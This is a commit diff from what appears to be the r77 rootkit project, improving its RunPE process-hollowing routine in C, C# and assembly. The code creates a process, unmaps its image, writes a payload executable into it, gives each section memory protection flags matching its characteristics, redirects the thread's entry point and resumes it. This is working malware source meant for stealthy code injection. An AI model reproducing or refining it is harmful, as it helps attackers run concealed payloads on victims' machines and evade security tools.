RunPE: Set page protection from section characteristics

Author: bytecode77

InstallShellcode/RunPE.asm

@@ -58,7 +58,7 @@ proc RunPE Executable:DWORD
 	test	eax, eax
 	jz		.C_retry_terminate
 
-	; Write section headers
+	; Write headers
 	pebcall	PEB_Kernel32Dll, PEB_WriteProcessMemory, [ProcessInformation + PROCESS_INFORMATION.hProcess], [ImageBase], [Executable], [SizeOfHeaders], NULL
 	test	eax, eax
 	jz		.C_retry_terminate

Stager/RunPE.cs

@@ -67,21 +67,31 @@ public static void Run(string path, string commandLine, byte[] payload, int pare
 
 				IntPtr sizeOfImagePtr = (IntPtr)sizeOfImage;
 				if (NtAllocateVirtualMemory(process, ref imageBase, IntPtr.Zero, ref sizeOfImagePtr, 0x3000, 0x40) < 0 ||
-					NtWriteVirtualMemory(process, imageBase, payload, sizeOfHeaders, IntPtr.Zero) < 0) throw new Exception();
+					NtWriteVirtualMemory(process, imageBase, payload, sizeOfHeaders, IntPtr.Zero) < 0 ||
+					!VirtualProtectEx(process, imageBase, (UIntPtr)sizeOfHeaders, 2, out _)) throw new Exception();
 
 				for (short j = 0; j < numberOfSections; j++)
 				{
 					byte[] section = new byte[0x28];
 					Buffer.BlockCopy(payload, ntHeaders + 0x18 + sizeOfOptionalHeader + j * 0x28, section, 0, 0x28);
 
+					byte[] nextSection = new byte[0x28];
+					if (j < numberOfSections - 1)
+					{
+						Buffer.BlockCopy(payload, ntHeaders + 0x18 + sizeOfOptionalHeader + (j + 1) * 0x28, nextSection, 0, 0x28);
+					}
+
 					int virtualAddress = BitConverter.ToInt32(section, 0xc);
 					int sizeOfRawData = BitConverter.ToInt32(section, 0x10);
 					int pointerToRawData = BitConverter.ToInt32(section, 0x14);
+					uint characteristics = BitConverter.ToUInt32(section, 0x24);
+					int nextSectionVirtualAddress = BitConverter.ToInt32(nextSection, 0xc);
 
 					byte[] rawData = new byte[sizeOfRawData];
 					Buffer.BlockCopy(payload, pointerToRawData, rawData, 0, rawData.Length);
 
 					if (NtWriteVirtualMemory(process, (IntPtr)((long)imageBase + virtualAddress), rawData, rawData.Length, IntPtr.Zero) < 0) throw new Exception();
+					if (!VirtualProtectEx(process, (IntPtr)((long)imageBase + virtualAddress), (UIntPtr)(j == numberOfSections - 1 ? sizeOfImage - virtualAddress : nextSectionVirtualAddress - virtualAddress), SectionCharacteristicsToProtection(characteristics), out _)) throw new Exception();
 				}
 
 				IntPtr thread = IntPtr.Size == 4 ? (IntPtr)BitConverter.ToInt32(processInfo, 4) : (IntPtr)BitConverter.ToInt64(processInfo, 8);
@@ -120,7 +130,48 @@ public static void Run(string path, string commandLine, byte[] payload, int pare
 			break;
 		}
 	}
-
+	/// <summary>
+	/// Converts an IMAGE_SECTION_HEADER.Characteristics flag to a memory page protection flag.
+	/// </summary>
+	/// <param name="characteristics">The characteristics of a section.</param>
+	/// <returns>
+	/// A <see cref="uint" /> value to be used with VirtualProtectEx.
+	/// </returns>
+	private static uint SectionCharacteristicsToProtection(uint characteristics)
+	{
+		if ((characteristics & 0x20000000) != 0 && (characteristics & 0x40000000) != 0 && (characteristics & 0x80000000) != 0)
+		{
+			return 0x40;
+		}
+		else if ((characteristics & 0x20000000) != 0 && (characteristics & 0x40000000) != 0)
+		{
+			return 0x20;
+		}
+		else if ((characteristics & 0x20000000) != 0 && (characteristics & 0x80000000) != 0)
+		{
+			return 0x80;
+		}
+		else if ((characteristics & 0x40000000) != 0 && (characteristics & 0x80000000) != 0)
+		{
+			return 0x4;
+		}
+		else if ((characteristics & 0x20000000) != 0)
+		{
+			return 0x10;
+		}
+		else if ((characteristics & 0x40000000) != 0)
+		{
+			return 0x2;
+		}
+		else if ((characteristics & 0x80000000) != 0)
+		{
+			return 0x8;
+		}
+		else
+		{
+			return 0x1;
+		}
+	}
 	/// <summary>
 	/// Allocates memory in the current process with the specified size. If this is a 64-bit process, the memory address is aligned by 16.
 	/// </summary>
@@ -136,6 +187,8 @@ private static IntPtr Allocate(int size)
 	private static extern IntPtr OpenProcess(int access, bool inheritHandle, int processId);
 	[DllImport("kernel32.dll")]
 	private static extern bool CreateProcess(string applicationName, string commandLine, IntPtr processAttributes, IntPtr threadAttributes, bool inheritHandles, uint creationFlags, IntPtr environment, string currentDirectory, IntPtr startupInfo, byte[] processInformation);
+	[DllImport("kernel32.dll")]
+	private static extern bool VirtualProtectEx(IntPtr process, IntPtr address, UIntPtr size, uint newProtect, out uint oldProtect);
 	[DllImport("ntdll.dll", SetLastError = true)]
 	private static extern int NtAllocateVirtualMemory(IntPtr process, ref IntPtr address, IntPtr zeroBits, ref IntPtr size, uint allocationType, uint protect);
 	[DllImport("ntdll.dll")]

r77api/r77win.c

@@ -705,6 +705,13 @@ BOOL RunPE(LPCWSTR path, LPBYTE payload)
 			// Cannot inject 64-bit payload from 32-bit process.
 			return FALSE;
 		}
+
+		if (!isPayload64Bit && BITNESS(64) && !IsAtLeastWindows10())
+		{
+			// Wow64 RunPE requires at least Windows 10.
+			//TODO: Custom implementation for Wow64GetThreadContext and Wow64SetThreadContext required to work on Windows 7.
+			return FALSE;
+		}
 	}
 	else
 	{
@@ -733,49 +740,63 @@ BOOL RunPE(LPCWSTR path, LPBYTE payload)
 				LPVOID imageBase = VirtualAllocEx(processInformation.hProcess, (LPVOID)ntHeaders->OptionalHeader.ImageBase, ntHeaders->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
 				if (imageBase && WriteProcessMemory(processInformation.hProcess, imageBase, payload, ntHeaders->OptionalHeader.SizeOfHeaders, NULL))
 				{
-					BOOL sectionsWritten = TRUE;
-
-					for (int j = 0; j < ntHeaders->FileHeader.NumberOfSections; j++)
+					DWORD oldProtect;
+					if (VirtualProtectEx(processInformation.hProcess, imageBase, ntHeaders->OptionalHeader.SizeOfHeaders, PAGE_READONLY, &oldProtect))
 					{
-						PIMAGE_SECTION_HEADER sectionHeader = (PIMAGE_SECTION_HEADER)((ULONG_PTR)IMAGE_FIRST_SECTION(ntHeaders) + j * (ULONG_PTR)IMAGE_SIZEOF_SECTION_HEADER);
-
-						if (!WriteProcessMemory(processInformation.hProcess, (LPBYTE)imageBase + sectionHeader->VirtualAddress, (LPBYTE)payload + sectionHeader->PointerToRawData, sectionHeader->SizeOfRawData, NULL))
+						BOOL sectionsWritten = TRUE;
+						PIMAGE_SECTION_HEADER sectionHeaders = (PIMAGE_SECTION_HEADER)IMAGE_FIRST_SECTION(ntHeaders);
+						for (int j = 0; j < ntHeaders->FileHeader.NumberOfSections; j++)
 						{
-							sectionsWritten = FALSE;
-							break;
+							if (!WriteProcessMemory(processInformation.hProcess, (LPBYTE)imageBase + sectionHeaders[j].VirtualAddress, (LPBYTE)payload + sectionHeaders[j].PointerToRawData, sectionHeaders[j].SizeOfRawData, NULL))
+							{
+								sectionsWritten = FALSE;
+								break;
+							}
+
+							if (!VirtualProtectEx(
+								processInformation.hProcess,
+								(LPBYTE)imageBase + sectionHeaders[j].VirtualAddress,
+								j == ntHeaders->FileHeader.NumberOfSections - 1 ? ntHeaders->OptionalHeader.SizeOfImage - sectionHeaders[j].VirtualAddress : sectionHeaders[j + 1].VirtualAddress - sectionHeaders[j].VirtualAddress,
+								SectionCharacteristicsToProtection(sectionHeaders[j].Characteristics),
+								&oldProtect
+							))
+							{
+								sectionsWritten = FALSE;
+								break;
+							}
 						}
-					}
 
-					if (sectionsWritten)
-					{
-						LPCONTEXT context = (LPCONTEXT)VirtualAlloc(NULL, sizeof(CONTEXT), MEM_COMMIT, PAGE_READWRITE);
-						if (context)
+						if (sectionsWritten)
 						{
-							context->ContextFlags = CONTEXT_FULL;
-
-							if (GetThreadContext(processInformation.hThread, context))
+							LPCONTEXT context = (LPCONTEXT)VirtualAlloc(NULL, sizeof(CONTEXT), MEM_COMMIT, PAGE_READWRITE);
+							if (context)
 							{
-#ifdef _WIN64
-								if (WriteProcessMemory(processInformation.hProcess, (LPVOID)(context->Rdx + 16), &ntHeaders->OptionalHeader.ImageBase, 8, NULL))
+								context->ContextFlags = CONTEXT_FULL;
+
+								if (GetThreadContext(processInformation.hThread, context))
 								{
-									context->Rcx = (DWORD64)imageBase + ntHeaders->OptionalHeader.AddressOfEntryPoint;
-									if (SetThreadContext(processInformation.hThread, context) &&
-										ResumeThread(processInformation.hThread) != -1)
+#ifdef _WIN64
+									if (WriteProcessMemory(processInformation.hProcess, (LPVOID)(context->Rdx + 16), &ntHeaders->OptionalHeader.ImageBase, 8, NULL))
 									{
-										return TRUE;
+										context->Rcx = (DWORD64)imageBase + ntHeaders->OptionalHeader.AddressOfEntryPoint;
+										if (SetThreadContext(processInformation.hThread, context) &&
+											ResumeThread(processInformation.hThread) != -1)
+										{
+											return TRUE;
+										}
 									}
-								}
 #else
-								if (WriteProcessMemory(processInformation.hProcess, (LPVOID)(context->Ebx + 8), &ntHeaders->OptionalHeader.ImageBase, 4, NULL))
-								{
-									context->Eax = (DWORD)imageBase + ntHeaders->OptionalHeader.AddressOfEntryPoint;
-									if (SetThreadContext(processInformation.hThread, context) &&
-										ResumeThread(processInformation.hThread) != -1)
+									if (WriteProcessMemory(processInformation.hProcess, (LPVOID)(context->Ebx + 8), &ntHeaders->OptionalHeader.ImageBase, 4, NULL))
 									{
-										return TRUE;
+										context->Eax = (DWORD)imageBase + ntHeaders->OptionalHeader.AddressOfEntryPoint;
+										if (SetThreadContext(processInformation.hThread, context) &&
+											ResumeThread(processInformation.hThread) != -1)
+										{
+											return TRUE;
+										}
 									}
-								}
 #endif
+								}
 							}
 						}
 					}
@@ -785,47 +806,55 @@ BOOL RunPE(LPCWSTR path, LPBYTE payload)
 			{
 				// Spawn 32-bit process from this 64-bit process.
 
-				if (!IsAtLeastWindows10())
-				{
-					//TODO: Custom implementation for Wow64GetThreadContext and Wow64SetThreadContext required to work on Windows 7.
-					return FALSE;
-				}
-
 				PIMAGE_NT_HEADERS32 ntHeaders = (PIMAGE_NT_HEADERS32)(payload + ((PIMAGE_DOS_HEADER)payload)->e_lfanew);
 				R77_NtUnmapViewOfSection(processInformation.hProcess, ntHeaders->OptionalHeader.ImageBase);
 
 				LPVOID imageBase = VirtualAllocEx(processInformation.hProcess, (LPVOID)ntHeaders->OptionalHeader.ImageBase, ntHeaders->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
 				if (imageBase && WriteProcessMemory(processInformation.hProcess, imageBase, payload, ntHeaders->OptionalHeader.SizeOfHeaders, NULL))
 				{
-					BOOL sectionsWritten = TRUE;
-
-					for (int j = 0; j < ntHeaders->FileHeader.NumberOfSections; j++)
+					DWORD oldProtect;
+					if (VirtualProtectEx(processInformation.hProcess, imageBase, ntHeaders->OptionalHeader.SizeOfHeaders, PAGE_READONLY, &oldProtect))
 					{
-						PIMAGE_SECTION_HEADER sectionHeader = (PIMAGE_SECTION_HEADER)((ULONG_PTR)IMAGE_FIRST_SECTION(ntHeaders) + j * (ULONG_PTR)IMAGE_SIZEOF_SECTION_HEADER);
-
-						if (!WriteProcessMemory(processInformation.hProcess, (LPBYTE)imageBase + sectionHeader->VirtualAddress, (LPBYTE)payload + sectionHeader->PointerToRawData, sectionHeader->SizeOfRawData, NULL))
+						BOOL sectionsWritten = TRUE;
+						PIMAGE_SECTION_HEADER sectionHeaders = (PIMAGE_SECTION_HEADER)IMAGE_FIRST_SECTION(ntHeaders);
+						for (int j = 0; j < ntHeaders->FileHeader.NumberOfSections; j++)
 						{
-							sectionsWritten = FALSE;
-							break;
+							if (!WriteProcessMemory(processInformation.hProcess, (LPBYTE)imageBase + sectionHeaders[j].VirtualAddress, (LPBYTE)payload + sectionHeaders[j].PointerToRawData, sectionHeaders[j].SizeOfRawData, NULL))
+							{
+								sectionsWritten = FALSE;
+								break;
+							}
+
+							if (!VirtualProtectEx(
+								processInformation.hProcess,
+								(LPBYTE)imageBase + sectionHeaders[j].VirtualAddress,
+								j == ntHeaders->FileHeader.NumberOfSections - 1 ? ntHeaders->OptionalHeader.SizeOfImage - sectionHeaders[j].VirtualAddress : sectionHeaders[j + 1].VirtualAddress - sectionHeaders[j].VirtualAddress,
+								SectionCharacteristicsToProtection(sectionHeaders[j].Characteristics),
+								&oldProtect
+							))
+							{
+								sectionsWritten = FALSE;
+								break;
+							}
 						}
-					}
 
-					if (sectionsWritten)
-					{
-						PWOW64_CONTEXT context = (PWOW64_CONTEXT)VirtualAlloc(NULL, sizeof(WOW64_CONTEXT), MEM_COMMIT, PAGE_READWRITE);
-						if (context)
+						if (sectionsWritten)
 						{
-							context->ContextFlags = WOW64_CONTEXT_FULL;
-
-							if (Wow64GetThreadContext(processInformation.hThread, context))
+							PWOW64_CONTEXT context = (PWOW64_CONTEXT)VirtualAlloc(NULL, sizeof(WOW64_CONTEXT), MEM_COMMIT, PAGE_READWRITE);
+							if (context)
 							{
-								if (WriteProcessMemory(processInformation.hProcess, (LPVOID)(context->Ebx + 8), &ntHeaders->OptionalHeader.ImageBase, 4, NULL))
+								context->ContextFlags = WOW64_CONTEXT_FULL;
+
+								if (Wow64GetThreadContext(processInformation.hThread, context))
 								{
-									context->Eax = (DWORD)imageBase + ntHeaders->OptionalHeader.AddressOfEntryPoint;
-									if (Wow64SetThreadContext(processInformation.hThread, context) &&
-										ResumeThread(processInformation.hThread) != -1)
+									if (WriteProcessMemory(processInformation.hProcess, (LPVOID)(context->Ebx + 8), &ntHeaders->OptionalHeader.ImageBase, 4, NULL))
 									{
-										return TRUE;
+										context->Eax = (DWORD)imageBase + ntHeaders->OptionalHeader.AddressOfEntryPoint;
+										if (Wow64SetThreadContext(processInformation.hThread, context) &&
+											ResumeThread(processInformation.hThread) != -1)
+										{
+											return TRUE;
+										}
 									}
 								}
 							}
@@ -847,6 +876,41 @@ BOOL RunPE(LPCWSTR path, LPBYTE payload)
 
 	return FALSE;
 }
+DWORD SectionCharacteristicsToProtection(DWORD characteristics)
+{
+	if ((characteristics & IMAGE_SCN_MEM_EXECUTE) && (characteristics & IMAGE_SCN_MEM_READ) && (characteristics & IMAGE_SCN_MEM_WRITE))
+	{
+		return PAGE_EXECUTE_READWRITE;
+	}
+	else if ((characteristics & IMAGE_SCN_MEM_EXECUTE) && (characteristics & IMAGE_SCN_MEM_READ))
+	{
+		return PAGE_EXECUTE_READ;
+	}
+	else if ((characteristics & IMAGE_SCN_MEM_EXECUTE) && (characteristics & IMAGE_SCN_MEM_WRITE))
+	{
+		return PAGE_EXECUTE_WRITECOPY;
+	}
+	else if ((characteristics & IMAGE_SCN_MEM_READ) && (characteristics & IMAGE_SCN_MEM_WRITE))
+	{
+		return PAGE_READWRITE;
+	}
+	else if (characteristics & IMAGE_SCN_MEM_EXECUTE)
+	{
+		return PAGE_EXECUTE;
+	}
+	else if (characteristics & IMAGE_SCN_MEM_READ)
+	{
+		return PAGE_READONLY;
+	}
+	else if (characteristics & IMAGE_SCN_MEM_WRITE)
+	{
+		return PAGE_WRITECOPY;
+	}
+	else
+	{
+		return PAGE_NOACCESS;
+	}
+}
 DWORD GetExecutableFunction(LPBYTE image, LPCSTR functionName)
 {
 	BOOL is64Bit;

r77api/r77win.h

@@ -261,6 +261,14 @@ BOOL IsExecutable64Bit(LPBYTE image, LPBOOL is64Bit);
 /// </returns>
 BOOL RunPE(LPCWSTR path, LPBYTE payload);
 /// <summary>
+/// Converts an IMAGE_SECTION_HEADER.Characteristics flag to a memory page protection flag.
+/// </summary>
+/// <param name="characteristics">The characteristics of a section.</param>
+/// <returns>
+/// A DWORD value to be used with VirtualProtectEx.
+/// </returns>
+DWORD SectionCharacteristicsToProtection(DWORD characteristics);
+/// <summary>
 /// Gets the file offset of an exported function from an executable file.
 /// </summary>
 /// <param name="image">A buffer with the executable file.</param>